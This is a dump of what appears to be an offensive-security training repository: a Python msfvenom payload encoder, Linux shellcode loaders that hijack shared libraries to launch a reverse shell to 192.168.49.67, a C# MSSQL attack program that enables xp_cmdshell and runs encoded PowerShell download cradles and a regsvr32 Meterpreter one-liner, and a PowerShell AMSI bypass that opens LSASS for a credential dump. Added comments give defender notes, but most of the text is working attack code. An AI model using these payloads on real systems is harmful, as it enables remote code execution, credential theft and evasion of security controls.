print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}")
result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE)

if result.returncode != 0:
    exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}")

# Get the payload bytes and split them
# Pulls the "0x..,0x.." list out of msfvenom's csharp-format initializer.
payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",")

# Encode the payload with the chosen type and key
# Defender note: single-byte XOR / ROT with a one-byte key is obfuscation, not
# encryption — there are only 255 candidate keys, so the bytes are trivially
# recoverable statically, and the emitted decode loop (see bottom) is itself a
# recognisable pattern. Once the loop runs, the cleartext buffer is in memory for
# AMSI / memory scanning to see.
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
for i, byte in enumerate(payload):
    byteInt = int(byte, 16)

    if args.type == "xor":
        byteInt = byteInt ^ args.key
    elif args.type == "rot":
        # '+' binds tighter than '&', so this is (byteInt + key) & 255.
        byteInt = byteInt + args.key & 255
    else:
        exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")

    # Re-emit as a zero-padded "0xNN" literal.
    payload[i] = "{0:#0{1}x}".format(byteInt,4)

# Format the output payload
# Wraps the comma-joined list every 65 characters and builds a C# byte[] initializer
# with the generating command and key recorded in leading comments.
payLen = len(payload)
payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
payloadFormatted += f"// {args.type}-encoded with key {hex(args.key)}\n"
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload}\n}};"
if payLen > 1000:
    # Large payloads go to a fixed, world-readable temp path instead of stdout.
    f = open("/tmp/payload.txt", "w")
    f.write(payloadFormatted)
    f.close()
    print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
else:
    print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
    print(payloadFormatted + "\n")

# Provide the decoding function for the heck of it
# The matching C# loop that reverses the transform at runtime.
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
if args.type == "xor":
    decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
{{
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
}}"""

if args.type == "rot":
    decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
{{
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
}}"""

print(decodingFunc)
85 |
--------------------------------------------------------------------------------
/Linux Shellcode Loaders/sharedLibrary_LD_LIBRARY_PATH.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | // Compile as follows
8 | //gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_LIBRARY_PATH.o sharedLibrary_LD_LIBRARY_PATH.c
9 | //gcc -shared -o sharedLibrary_LD_LIBRARY_PATH.so sharedLibrary_LD_LIBRARY_PATH.o -ldl
10 |
// Runs automatically when the shared object is mapped (constructor attribute), so
// no exported function has to be called by the host program — loading is enough.
static void runmahpayload() __attribute__((constructor));

// NOTE(review): presumably dummy definitions of the symbols the host binary expects
// from the genuine library (per the readelf note), so the dynamic loader accepts this
// .so in its place — confirm against the library actually being replaced.
int gpgrt_onclose;
// [...output from readelf here...]
int gpgrt_poll;

// ROT13-encoded 'linux/x64/shell_reverse_tcp' payload
// (presumably decoded in place by runmahpayload() below; the buffer lives in the
// library's writable data segment).
char buf[] = "\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12";
19 |
20 | void runmahpayload() {
21 | setuid(0);
22 | setgid(0);
23 | printf("Library hijacked!\n");
24 | int buf_len = (int) sizeof(buf);
25 | for (int i=0; i
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | // To compile:
9 | // gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
10 | // gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl
11 |
12 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c
13 | unsigned char buf[] =
14 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
15 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
16 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
17 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
18 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
19 |
// Hooked geteuid(): because this symbol is exported from the preloaded library
// it is resolved ahead of libc's version in any process started with LD_PRELOAD
// pointing at the .so. The parent path forwards to the real geteuid(); the child
// path executes `buf`.
//
// Defender notes: the observable artefacts are the LD_PRELOAD variable in the
// affected process's environment, a fork() from inside a hooked libc call, and
// an mprotect() that makes a data page of a shared object executable. All three
// are unusual for legitimate software and are common audit/EDR rule triggers.
uid_t geteuid(void)
{
    // Resolve the *next* 'geteuid' in the symbol lookup order (libc's) so the
    // parent can still return a correct value to its caller.
    typeof(geteuid) *old_geteuid;
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");

    // fork() creates a child process (not a thread); it returns 0 in the child.
    // NOTE(review): a fork() failure returns -1, which is indistinguishable from
    // the parent path here and silently falls through to the original function.
    if (fork() == 0)
    {
        intptr_t pagesize = sysconf(_SC_PAGESIZE);

        // `buf` lives in a writable, non-executable data section of the .so, so
        // the page containing it is made executable. The address is rounded down
        // because mprotect() requires a page-aligned start.
        // NOTE(review): only one page is changed; if `buf` straddles a page
        // boundary the tail remains non-executable.
        if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
            perror("mprotect");
            // NOTE(review): uid_t is unsigned, so -1 wraps to UID_MAX; this value
            // is returned to the caller's code, which keeps running in the child.
            return -1;
        }

        // Treat the byte array as a function and call it. Control is not
        // expected to come back; if it does, the child continues below.
        int (*ret)() = (int(*)())buf;
        ret();
    }
    else
    {
        // Parent: behave like the real function so the host program is
        // unaffected apart from the extra line on stdout.
        printf("[Hijacked] Returning from function...\n");
        return (*old_geteuid)();
    }
    // Reached only by the child, and only if the payload returns.
    printf("[Hijacked] Returning from main...\n");
    return -2;
}
--------------------------------------------------------------------------------
/Linux Shellcode Loaders/simpleLoader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // To compile:
6 | // gcc -o simpleLoader simpleLoader.c -z execstack
7 |
8 | // XOR-encoded 'linux/x64/shell_reverse_tcp' payload (key: 0xfa)
9 | unsigned char buf[] = "\x90\xD3\xA2\x63\x90\xF8\xA5\x90\xFB\xA4\xF5\xFF\xB2\x6D\xB2\x43\xF8\xFA\xFA\xAA\x3A\x52\xCB\xB9\xAB\xB2\x73\x1C\x90\xEA\xA0\x90\xD0\xA2\xF5\xFF\x90\xF9\xA4\xB2\x05\x34\x90\xDB\xA2\xF5\xFF\x8F\x0C\x90\xC1\xA2\x63\xB2\x41\xD5\x98\x93\x94\xD5\x89\x92\xFA\xA9\xB2\x73\x1D\xA8\xAD\xB2\x73\x1C\xF5\xFF\xFA";
10 |
11 | int main (int argc, char **argv)
12 | {
13 | int key = 250;
14 | int buf_len = (int) sizeof(buf);
15 |
16 | // Decode the payload
17 | for (int i=0; i
2 | #include
3 | #include
4 |
5 | // To compile:
6 | // gcc simpleXORencoder.c -o simpleXORencoder
7 |
8 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c
9 | unsigned char buf[] =
10 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
11 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
12 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
13 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
14 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
15 |
16 | int main (int argc, char **argv)
17 | {
18 | int key = 250;
19 | int buf_len = (int) sizeof(buf);
20 |
21 | printf("XOR payload (key 0xfa):\n");
22 |
23 | for(int i=0; i
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/MSSQL/MSSQL.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {189219A1-9A2A-4B09-8F69-6207E9996F94}
8 | Exe
9 | MSSQL
10 | MSSQL
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/MSSQL/MSSQL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MSSQL", "MSSQL.csproj", "{189219A1-9A2A-4B09-8F69-6207E9996F94}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {BE43F471-75F0-4066-9D25-9B513A0E3956}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/MSSQL/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data.SqlClient;
3 |
4 | namespace MSSQL
5 | {
/// <summary>
/// Walk-through of SQL Server trust abuse from a domain-joined client using
/// Windows integrated authentication: login/role enumeration, forced outbound
/// SMB authentication via xp_dirtree, login/user impersonation, OS command
/// execution (xp_cmdshell, OLE automation) and linked-server traversal, all
/// against hard-coded lab hosts.
/// </summary>
/// <remarks>
/// NOTE(review): <see cref="Main"/> does not compile as written — <c>res</c> is
/// declared with <c>String res =</c> eight times in one scope and <c>cmd</c>
/// twice (CS0128). The commented sections read as independent copy-paste
/// snippets rather than one runnable program.
///
/// Defender notes: every step is plain T-SQL and is visible to SQL Server Audit
/// / Extended Events; sp_configure changes are written to the SQL Server error
/// log, and both 'xp_cmdshell' and 'Ole Automation Procedures' are disabled by
/// default. Processes spawned through either land with sqlservr.exe as parent,
/// which is a high-fidelity process-tree detection. The impersonation steps
/// depend on explicit IMPERSONATE grants (enumerable via the same sys.* views
/// used below) and, presumably, on a TRUSTWORTHY database for the dbo hop —
/// both are configuration items worth auditing.
/// </remarks>
public class Program
{
    /// <summary>
    /// Runs <paramref name="query"/> on the open connection <paramref name="con"/>
    /// and returns the first column of every result row, each followed by "\n".
    /// </summary>
    /// <param name="query">T-SQL text, passed to SqlCommand verbatim. Callers on
    /// this page build it by string interpolation of literals; there is no
    /// parameterisation.</param>
    /// <param name="con">An already opened SqlConnection.</param>
    /// <returns>Concatenated first-column values, or "" if reading the results throws.</returns>
    /// <remarks>
    /// NOTE(review): cmd.ExecuteReader() runs before the try, so a failing
    /// statement propagates a SqlException instead of yielding "". The reader
    /// is only closed on the success path (no using/finally).
    /// </remarks>
    public static String executeQuery(String query, SqlConnection con)
    {
        SqlCommand cmd = new SqlCommand(query, con);
        SqlDataReader reader = cmd.ExecuteReader();
        try
        {
            String result = "";
            while (reader.Read() == true)
            {
                // reader[0] is boxed; a NULL column arrives as DBNull and stringifies to "".
                result += reader[0] + "\n";
            }
            reader.Close();
            return result;
        }
        catch
        {
            // Any read error is swallowed and reported as an empty result.
            return "";
        }
    }

    /// <summary>
    /// Prints whether the current login holds the server role
    /// <paramref name="groupToCheck"/> (IS_SRVROLEMEMBER returns 1 for member,
    /// 0 for non-member).
    /// </summary>
    /// <remarks>
    /// NOTE(review): the role name is interpolated straight into the T-SQL. Both
    /// call sites pass literals, but the method is not safe for caller-supplied
    /// input. IS_SRVROLEMEMBER returns NULL for an unknown role, which
    /// executeQuery turns into "\n"; int.Parse then throws FormatException. The
    /// trailing "\n" on a valid result is tolerated because int.Parse ignores
    /// surrounding whitespace.
    /// </remarks>
    public static void getGroupMembership(String groupToCheck, SqlConnection con)
    {
        String res = executeQuery($"SELECT IS_SRVROLEMEMBER('{groupToCheck}');", con);
        int role = int.Parse(res);
        if (role == 1)
        {
            Console.WriteLine($"[+] User is a member of the '{groupToCheck}' group.");
        }
        else
        {
            Console.WriteLine($"[-] User is not a member of the '{groupToCheck}' group.");
        }
    }

    /// <summary>
    /// Linear walk-through: connect with the caller's Windows identity,
    /// enumerate login and roles, then exercise each primitive in turn.
    /// Detection/mitigation pointers are given inline at the statement they
    /// apply to.
    /// </summary>
    public static void Main(string[] args)
    {
        // Integrated Security = True: authenticates as the process's Windows
        // account (no credentials in the binary). Server name is a lab host.
        String serv = "dc01.corp1.com";
        String db = "master";
        String conStr = $"Server = {serv}; Database = {db}; Integrated Security = True;";
        SqlConnection con = new SqlConnection(conStr);

        try
        {
            con.Open();
            Console.WriteLine("[+] Authenticated to MSSQL Server!");
        }
        catch
        {
            // NOTE(review): exits with status 0 even though this is the failure path.
            Console.WriteLine("[-] Authentication failed.");
            Environment.Exit(0);
        }

        // Enumerate login info
        String login = executeQuery("SELECT SYSTEM_USER;", con);
        Console.WriteLine($"[*] Logged in as: {login}");
        String uname = executeQuery("SELECT USER_NAME();", con);
        Console.WriteLine($"[*] Database username: {uname}");
        getGroupMembership("public", con);
        getGroupMembership("sysadmin", con);

        // Force NTLM authentication for hash-grabbing or relaying
        // xp_dirtree against a UNC path makes the SQL Server *service account*
        // authenticate outbound to that host. Mitigations: block outbound SMB from
        // database servers, require SMB signing / EPA on relay targets, and run the
        // service under a low-privilege account.
        // NOTE(review): first of eight `String res =` declarations in this scope
        // (also at the IMPERSONATE query, EXECUTE AS LOGIN, both msdb blocks,
        // sp_linkedservers and the two linked-server blocks) — CS0128.
        String targetShare = "\\\\192.168.49.67\\share";
        String res = executeQuery($"EXEC master..xp_dirtree \"{targetShare}\";", con);
        Console.WriteLine($"[*] Forced authentication to '{targetShare}'.");

        // Get logins that we can impersonate
        // Same view a DBA would query to find over-broad IMPERSONATE grants.
        String res = executeQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; ", con);
        Console.WriteLine($"[*] User can impersonate the following logins: {res}.");

        // Impersonate login and get login information
        // EXECUTE AS LOGIN switches the session's login; it only succeeds with an
        // IMPERSONATE grant on that login and persists until REVERT.
        String su = executeQuery("SELECT SYSTEM_USER;", con);
        String un = executeQuery("SELECT USER_NAME();", con);
        Console.WriteLine($"[*] Current database login is '{su}' with system user '{un}'.");
        String res = executeQuery("EXECUTE AS LOGIN = 'sa';", con);
        Console.WriteLine($"[*] Triggered impersonation.");
        su = executeQuery("SELECT SYSTEM_USER;", con);
        un = executeQuery("SELECT USER_NAME();", con);
        Console.WriteLine($"[*] Current database login is '{su}' with system user '{un}'.");

        // Impersonate dbo in trusted database and execute through 'xp_cmdshell'
        // sp_configure 'xp_cmdshell' is off by default and the change is logged in
        // the SQL Server error log; `cmd` is an encoded PowerShell one-liner (-enc).
        String res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con);
        Console.WriteLine("[*] Triggered impersonation.");
        res = executeQuery("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;", con);
        Console.WriteLine("[*] Enabled 'xp_cmdshell'.");
        String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA=";
        res = executeQuery($"EXEC xp_cmdshell '{cmd}'", con);
        Console.WriteLine($"[*] Executed command! Result: {res}");

        // Impersonate dbo in trusted database and execute through 'sp_OACreate'
        // 'Ole Automation Procedures' is also off by default. The WScript.Shell
        // object is created inside the server process, so the launched command
        // again has sqlservr.exe as its parent.
        // NOTE(review): second declaration of `String cmd` in this scope (CS0128);
        // the literal is identical to the one above.
        String res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con);
        Console.WriteLine("[*] Triggered impersonation.");
        res = executeQuery("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", con);
        Console.WriteLine("[*] Enabled OLE automation procedures.");
        String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA=";
        res = executeQuery($"DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, '{cmd}';", con);
        Console.WriteLine($"[*] Executed command!");

        //
        // Execution via loading custom assemblies is also possible, but for brevity not included here
        //

        // Enumerate linked servers
        String res = executeQuery("EXEC sp_linkedservers;", con);
        Console.WriteLine($"[*] Found linked servers: {res}");

        // Execute on linked server
        // EXEC (...) AT requires 'RPC Out' on the link and runs under whatever login
        // the link maps to; the reach of these hops is bounded by that mapping.
        String res = executeQuery("EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT DC01;", con);
        Console.WriteLine($"[*] Enabled advanced options on DC01.");
        res = executeQuery("EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT DC01;", con);
        Console.WriteLine($"[*] Enabled xp_cmdshell option on DC01.");
        res = executeQuery("EXEC ('xp_cmdshell ''whoami'';') AT DC01;", con);
        Console.WriteLine($"[*] Triggered command. Result: {res}");

        // Execute on linked server via 'openquery'
        // The leading 'select 1;' lets a non-query batch pass through OPENQUERY.
        // The third call runs regsvr32 with a remote scriptlet on the linked host —
        // a widely signatured command line.
        String res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure')", con);
        Console.WriteLine($"[*] Enabled advanced options on DC01.");
        res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure')", con);
        Console.WriteLine($"[*] Enabled xp_cmdshell options on DC01.");
        res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; exec xp_cmdshell ''regsvr32 /s /n /u /i:http://192.168.49.67:8080/F0t6R5A.sct scrobj.dll''')", con);
        Console.WriteLine($"[*] Triggered Meterpreter oneliner on DC01. Check your listener!");

        // Escalate via double database link
        // NOTE(review): in the published source this comment line runs straight into
        // `String su = executeQuery("SELECT SYSTEM_USER;", con);` — most likely a lost
        // line break. As a comment it is inert, and `su` below refers to the variable
        // declared earlier in this method.
        Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01'.");
        su = executeQuery("select mylogin from openquery(\"dc01\", 'select SYSTEM_USER as mylogin');", con);
        Console.WriteLine($"[*] Current system user is '{su}' in database 'dc01' via 1 link.");
        su = executeQuery("select mylogin from openquery(\"dc01\", 'select mylogin from openquery(\"appsrv01\", ''select SYSTEM_USER as mylogin'')');", con);
        Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01' via 2 links.");
    }
}
137 | }
--------------------------------------------------------------------------------
/MSSQL/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("MSSQL")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("MSSQL")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("189219a1-9a2a-4b09-8f69-6207e9996f94")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/MiniDump/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/MiniDump/MiniDump.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}
8 | Exe
9 | MiniDump
10 | MiniDump
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/MiniDump/MiniDump.ps1:
--------------------------------------------------------------------------------
# Bypass AMSI because we're cool
# Uses reflection to set the non-public static field amsiInitFailed on
# System.Management.Automation.AmsiUtils to $true, after which this process
# skips AMSI scanning of script content. The type and field names are assembled
# from fragments ('Amsi'+[char]85+'tils', 'ams'+[char]105+'InitFailed').
# Defender note: this exact pattern is well known and widely signatured, and
# PowerShell Script Block Logging (Event ID 4104) still records the line
# regardless of AMSI state.
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
3 |
4 | # Utility functions
# Resolves the address of an exported native function without a DllImport
# declaration: finds the GAC-loaded System.dll, pulls its internal type
# Microsoft.Win32.UnsafeNativeMethods, and calls that type's GetModuleHandle
# and GetProcAddress wrappers via reflection.
#   $moduleName   - module name as GetModuleHandle expects it (the module must
#                   already be loaded in this process)
#   $functionName - exported symbol name
# Returns the IntPtr produced by GetProcAddress.
# NOTE(review): if the module is not loaded, GetModuleHandle returns Zero and
# GetProcAddress then returns Zero; nothing here checks for either.
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
# GetProcAddress is overloaded; collect every overload and use the first.
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}
15 |
# Builds a delegate type at runtime, inside a dynamic in-memory assembly
# ('ReflectedDelegate' / 'InMemoryModule'), whose Invoke signature is
# ($func parameter types) -> $delType. The result is what
# [Marshal]::GetDelegateForFunctionPointer needs to call a raw function pointer.
#   $func    - array of parameter types (mandatory)
#   $delType - return type, [Void] by default
# Returns the constructed [Type].
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
# Delegates must derive from MulticastDelegate and be sealed.
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
# Constructor and Invoke are runtime-provided ('Runtime, Managed'), so no IL
# body is emitted for either.
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
36 |
# Add dbghelp.dll and reflectively load the function while we're at it
# (somehow dbghelp.dll doesn't play nice with LookupFunc)
# NOTE(review): unlike LookupFunc, Add-Type -MemberDefinition compiles C# at
# runtime; in Windows PowerShell that means a csc.exe child process and a
# temporary assembly on disk, both routinely monitored. The P/Invoke below has
# no SetLastError = true, so no Win32 error code is available when it fails.
$MethodDefinition = @'
[DllImport("DbgHelp.dll", CharSet = CharSet.Unicode)]
public static extern bool MiniDumpWriteDump(
IntPtr hProcess,
uint processId,
IntPtr hFile,
uint dumpType,
IntPtr expParam,
IntPtr userStreamParam,
IntPtr callbackParam
);
'@
$dbghelp = Add-Type -MemberDefinition $MethodDefinition -Name 'dbghelp' -Namespace 'Win32' -PassThru

# Get LSASS PID
$lsassPid = Get-Process lsass | select -ExpandProperty Id
Write-Host("Got lsass.exe PID: $lsassPid.")

# Get a handle on LSASS
# 0x1F0FFF is PROCESS_ALL_ACCESS. Defender notes: a handle to lsass.exe with this
# access mask from a non-system process is the classic Sysmon Event ID 10
# (ProcessAccess) detection. With LSA protection (RunAsPPL) enabled the open is
# denied for non-protected processes; with Credential Guard the isolated secrets
# are not in LSASS memory to begin with.
# NOTE(review): $handle is not checked for 0 before use.
$handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
(getDelegateType @([UInt32], [Bool], [Int])([IntPtr]))).Invoke(0x1F0FFF,$false,$lsassPid)
Write-Host("Got handle on LSASS: $handle.")

# Dump process memory to file
# dumpType 2 = MiniDumpWithFullMemory (same constant as the C# MiniDump project).
# The dump is written unencrypted; a *.dmp created under C:\Windows\Tasks by
# powershell.exe is itself a useful file-creation alert.
# NOTE(review): the file is created before the dump is attempted and is left
# behind (empty) when MiniDumpWriteDump returns $false.
$filePath = "C:\Windows\Tasks\lsass.dmp"
$dumpFile = New-Object IO.FileStream $filePath,'Create','Write','Read'
